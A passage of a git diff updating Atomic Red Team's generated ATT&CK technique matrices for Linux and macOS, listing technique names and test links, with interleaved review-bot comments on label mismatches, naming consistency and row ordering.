+| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
+| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Process Discovery](../../T1057/T1057.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
+| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | | | [Non-Standard Port](../../T1571/T1571.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [Remote System Discovery](../../T1018/T1018.md) | | | | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | [System Time Discovery](../../T1124/T1124.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Disable or Modify Linux Audit System](../../T1562.012/T1562.012.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
+| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) | |
+| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
+| | | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
+| | | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
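Review bot: the defense-evasion cell "[Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md)" in the added row that begins "| | | Compromise Host Software Binary" carries a display name from the Email Collection family while its link targets T1070.008, an Indicator Removal on Host sub-technique id; every other T1070.* cell in this column is labelled "Indicator Removal on Host: ..." (T1070.002, T1070.003, T1070.006), so the name and the id disagree. Please check the technique name recorded in the T1070.008 atomic's YAML that this matrix is generated from and regenerate, rather than hand-editing the table. Separately, this hunk re-emits a large block of the table as added rows with no paired removed rows visible alongside them, which is expected for a generated matrix but hides which rows actually changed; a one-line note in the PR description naming the generator command that produced these files would let reviewers reproduce the output instead of diffing it by eye.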
@@ -62,6 +64,7 @@
| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | | | Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
| | | | | Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
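Review bot: the new placeholder "Polymorphic Code [CONTRIBUTE A TEST]" is added to the defense-evasion column without a parent-technique prefix, while neighbouring sub-technique cells in the same column are written as "Masquerading: Rename System Utilities" and "Hide Artifacts: Hidden Window"; the unchanged context already mixes both styles, so a reader cannot tell from the cell alone whether an entry is a top-level technique or a sub-technique. Suggest having the generator emit the parent-prefixed name for every sub-technique it places in the matrix, so that the placeholder cells are self-describing and match the linked cells' convention.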
@@ -72,8 +75,10 @@
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | | | Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | | | Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) | | | | | | | |
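Review bot: the two new placeholder rows ("Relocate Malware" inserted after "Hide Artifacts: Hidden Window", "Masquerade Account Name" inserted after "Clear Persistence") land at positions that follow no visible ordering in the defense-evasion column (neither alphabetical nor grouped by parent technique), so every regeneration that picks up new ATT&CK entries scatters single-line insertions through the table and the resulting hunks reflect upstream data order rather than a meaningful change. Suggest sorting cells within each column in the generator (by technique id or by name) so future diffs of the matrix files are minimal and reviewable; if the current order is intentional, document that choice in the generator so reviewers stop asking.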
diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md
index bdea851471..f756444ca4 100644
--- a/atomics/Indexes/Matrices/macos-matrix.md
+++ b/atomics/Indexes/Matrices/macos-matrix.md
@@ -5,37 +5,38 @@
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
